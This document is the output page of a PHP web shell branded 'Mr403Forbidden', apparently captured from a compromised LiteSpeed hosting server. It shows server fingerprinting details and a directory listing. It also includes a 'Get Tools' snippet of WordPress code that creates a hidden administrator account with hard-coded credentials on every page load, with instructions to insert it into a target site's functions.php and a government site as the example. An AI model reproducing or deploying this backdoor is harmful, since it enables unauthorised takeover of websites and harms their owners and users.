./Mr403Forbidden

:/dev/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
block dir 2026-03-17 2:21 - root/root s---------
bsg dir 2026-03-17 4:21 - root/root s---------
bus dir 2026-03-17 4:21 - root/root s---------
char dir 2026-03-17 2:21 - root/root s---------
cpu dir 2026-03-17 4:21 - root/root s---------
disk dir 2026-03-17 4:21 - root/root s---------
dri dir 2026-03-17 2:21 - root/root s---------
fd dir 2026-03-18 4:36 - business1/business1 s---------
hugepages dir 2026-03-17 2:21 - root/root s---------
input dir 2026-03-17 2:21 - root/root s---------
mapper dir 2026-03-17 2:21 - root/root s---------
mqueue dir 2026-03-18 2:52 - root/root s---------
net dir 2026-03-17 2:21 - root/root s---------
pts dir 2026-03-17 4:21 - root/root s---------
raw dir 2026-03-17 4:21 - root/root s---------
shm dir 2026-03-18 3:35 - root/root s---------
snd dir 2026-03-17 2:21 - root/root s---------
vfio dir 2026-03-17 2:21 - root/root s---------
core file 2026-03-17 4:21 128 TB root/root s---------
stderr file 2026-03-18 4:36 883.76 MB nobody/nobody s---------
stdout file 2026-03-18 4:36 883.76 MB nobody/nobody s---------

© ./Mr403Forbidden